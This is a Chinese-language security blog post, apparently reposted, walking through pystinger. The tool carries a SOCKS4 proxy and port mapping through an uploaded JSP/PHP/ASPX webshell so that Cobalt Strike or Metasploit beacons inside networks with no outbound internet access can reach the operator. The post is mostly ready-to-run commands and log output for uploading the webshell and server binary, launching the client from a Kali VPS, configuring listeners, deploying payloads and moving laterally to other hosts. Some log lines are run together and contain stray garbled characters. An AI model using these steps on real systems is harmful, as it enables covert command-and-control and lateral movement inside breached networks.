文章來(lái)源：?Khan安全攻防實(shí)驗(yàn)室

pystinger通過(guò)webshell實(shí)現(xiàn)內(nèi)網(wǎng)SOCK4代理,端口映射夫嗓，可直接用于metasploit-framework,viper,cobalt strike上線。

????????主體使用python開(kāi)發(fā),當(dāng)前支持php,jsp(x),aspx三種代理腳本锰悼。

????假設(shè)不出網(wǎng)服務(wù)器域名為?http://example.com:8080?,服務(wù)器內(nèi)網(wǎng)IP地址為192.168.3.11

1 . SOCK4代理

proxy.jsp上傳到目標(biāo)服務(wù)器,確保?http://example.com:8080/proxy.jsp?可以訪問(wèn),頁(yè)面返回UTF-8

將stinger_server.exe上傳到目標(biāo)服務(wù)器,蟻劍/冰蝎執(zhí)行start D:/XXX/stinger_server.exe啟動(dòng)服務(wù)端

不要直接運(yùn)行D:/XXX/stinger_server.exe,會(huì)導(dǎo)致tcp斷連

vps執(zhí)行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

如下輸出表示成功

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listencheckpass2020-01-0621:12:47,674- INFO -623- Socks4aon127.0.0.1:600002020-01-0621:12:47,674- INFO -628- WEBSHELL checking ...2020-01-0621:12:47,681- INFO -631- WEBSHELLcheckpass2020-01-0621:12:47,681- INFO -632-http://example.com:8080/proxy.jsp2020-01-0621:12:47,682- INFO -637- REMOTE_SERVER checking ...2020-01-0621:12:47,696- INFO -644- REMOTE_SERVERcheckpass2020-01-0621:12:47,696- INFO -645---- Sever Config ---2020-01-0621:12:47,696- INFO -647- client_address_list => []2020-01-0621:12:47,696- INFO -647- SERVER_LISTEN =>127.0.0.1:600102020-01-0621:12:47,696- INFO -647- LOG_LEVEL => INFO2020-01-0621:12:47,697- INFO -647- MIRROR_LISTEN =>127.0.0.1:600202020-01-0621:12:47,697- INFO -647- mirror_address_list => []2020-01-0621:12:47,697- INFO -647- READ_BUFF_SIZE =>512002020-01-0621:12:47,697- INFO -673- TARGET_ADDRESS :127.0.0.1:600202020-01-0621:12:47,697- INFO -677- SLEEP_TIME :0.012020-01-0621:12:47,697- INFO -679---- RAT Config ---2020-01-0621:12:47,697- INFO -681-Handler/LISTEN should listenon127.0.0.1:600202020-01-0621:12:47,697- INFO -683- Payload shouldconnectto127.0.0.1:600202020-01-0621:12:47,698-WARNING-111- LoopThreadstart2020-01-0621:12:47,703-WARNING-502- socks4aserverstarton127.0.0.1:600002020-01-0621:12:47,703-WARNING-509- Socks4a readytoaccept

此時(shí)已經(jīng)在vps127.0.0.1:60000啟動(dòng)了一個(gè)example.com所在內(nèi)網(wǎng)的socks4a代理

此時(shí)已經(jīng)將目標(biāo)服務(wù)器的127.0.0.1:60020映射到vps的127.0.0.1:60020

2 . cobalt strike單主機(jī)上線

proxy.jsp上傳到目標(biāo)服務(wù)器,確保?http://example.com:8080/proxy.jsp?可以訪問(wèn),頁(yè)面返回UTF-8

將stinger_server.exe上傳到目標(biāo)服務(wù)器,蟻劍/冰蝎執(zhí)行start D:/XXX/stinger_server.exe啟動(dòng)服務(wù)端

不要直接運(yùn)行D:/XXX/stinger_server.exe,會(huì)導(dǎo)致tcp斷連

stinger_client命令行執(zhí)行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

如下輸出表示成功

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listencheckpass2020-01-0621:12:47,674- INFO -623- Socks4aon127.0.0.1:600002020-01-0621:12:47,674- INFO -628- WEBSHELL checking ...2020-01-0621:12:47,681- INFO -631- WEBSHELLcheckpass2020-01-0621:12:47,681- INFO -632-http://example.com:8080/proxy.jsp2020-01-0621:12:47,682- INFO -637- REMOTE_SERVER checking ...2020-01-0621:12:47,696- INFO -644- REMOTE_SERVERcheckpass2020-01-0621:12:47,696- INFO -645---- Sever Config ---2020-01-0621:12:47,696- INFO -647- client_address_list => []2020-01-0621:12:47,696- INFO -647- SERVER_LISTEN =>127.0.0.1:600102020-01-0621:12:47,696- INFO -647- LOG_LEVEL => INFO2020-01-0621:12:47,697- INFO -647- MIRROR_LISTEN =>127.0.0.1:600202020-01-0621:12:47,697- INFO -647- mirror_address_list => []2020-01-0621:12:47,697- INFO -647- READ_BUFF_SIZE =>512002020-01-0621:12:47,697- INFO -673- TARGET_ADDRESS :127.0.0.1:600202020-01-0621:12:47,697- INFO -677- SLEEP_TIME :0.012020-01-0621:12:47,697- INFO -679---- RAT Config ---2020-01-0621:12:47,697- INFO -681-Handler/LISTEN should listenon127.0.0.1:600202020-01-0621:12:47,697- INFO -683- Payload shouldconnectto127.0.0.1:600202020-01-0621:12:47,698-WARNING-111- LoopThreadstart2020-01-0621:12:47,703-WARNING-502- socks4aserverstarton127.0.0.1:600002020-01-0621:12:47,703-WARNING-509- Socks4a readytoaccept

cobalt strike添加監(jiān)聽(tīng),端口選擇輸出信息RAT Config中的Handler/LISTEN中的端口(通常為60020),beacons為127.0.0.1

生成payload,上傳到主機(jī)運(yùn)行后即可上線

3 . cobalt strike多主機(jī)上線

proxy.jsp上傳到目標(biāo)服務(wù)器,確保?http://example.com:8080/proxy.jsp?可以訪問(wèn),頁(yè)面返回UTF-8

將stinger_server.exe上傳到目標(biāo)服務(wù)器,蟻劍/冰蝎執(zhí)行start D:/XXX/stinger_server.exe 192.168.3.11啟動(dòng)服務(wù)端

192.168.3.11可以改成0.0.0.0

stinger_client命令行執(zhí)行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

如下輸出表示成功

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listencheckpass2020-01-0621:12:47,674- INFO -623- Socks4aon127.0.0.1:600002020-01-0621:12:47,674- INFO -628- WEBSHELL checking ...2020-01-0621:12:47,681- INFO -631- WEBSHELLcheckpass2020-01-0621:12:47,681- INFO -632-http://example.com:8080/proxy.jsp2020-01-0621:12:47,682- INFO -637- REMOTE_SERVER checking ...2020-01-0621:12:47,696- INFO -644- REMOTE_SERVERcheckpass2020-01-0621:12:47,696- INFO -645---- Sever Config ---2020-01-0621:12:47,696- INFO -647- client_address_list => []2020-01-0621:12:47,696- INFO -647- SERVER_LISTEN =>127.0.0.1:600102020-01-0621:12:47,696- INFO -647- LOG_LEVEL => INFO2020-01-0621:12:47,697- INFO -647- MIRROR_LISTEN =>192.168.3.11:600202020-01-0621:12:47,697- INFO -647- mirror_address_list => []2020-01-0621:12:47,697- INFO -647- READ_BUFF_SIZE =>512002020-01-0621:12:47,697- INFO -673- TARGET_ADDRESS :127.0.0.1:600202020-01-0621:12:47,697- INFO -677- SLEEP_TIME :0.012020-01-0621:12:47,697- INFO -679---- RAT Config ---2020-01-0621:12:47,697- INFO -681-Handler/LISTEN should listenon127.0.0.1:600202020-01-0621:12:47,697- INFO -683- Payload shouldconnectto192.168.3.11:600202020-01-0621:12:47,698-WARNING-111- LoopThreadstart2020-01-0621:12:47,703-WARNING-502- socks4aserverstarton127.0.0.1:600002020-01-0621:12:47,703-WARNING-509- Socks4a readytoaccept

cobalt strike添加監(jiān)聽(tīng),端口選擇RAT Config中的Handler/LISTEN中的端口(通常為60020),beacons為192.168.3.11(example.com的內(nèi)網(wǎng)IP地址)

生成payload,上傳到主機(jī)運(yùn)行后即可上線

橫向移動(dòng)到其他主機(jī)時(shí)可以將payload指向192.168.3.11:60020即可實(shí)現(xiàn)出網(wǎng)上線

4 . 定制Header及proxy

如果webshell需要配置Cookie或者Authorization,可通過(guò)--header參數(shù)配置請(qǐng)求頭

--header "Authorization: XXXXXX,Cookie: XXXXX"

如果webshell需要通過(guò)代理訪問(wèn),可通過(guò)--proxy設(shè)置代理

--proxy "socks5:127.0.0.1:1081"

stinger_server\stinger_client

windows

linux

proxy.jsp(x)/php/aspx

php7.2

tomcat7.0

iis8.0

項(xiàng)目地址：

https://github.com/FunnyWolf/pystinger/releases/tag/v1.6